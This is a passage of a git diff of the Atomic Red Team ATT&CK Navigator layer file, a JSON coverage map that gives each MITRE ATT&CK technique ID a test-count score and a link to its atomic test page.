Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":31,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":60,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View 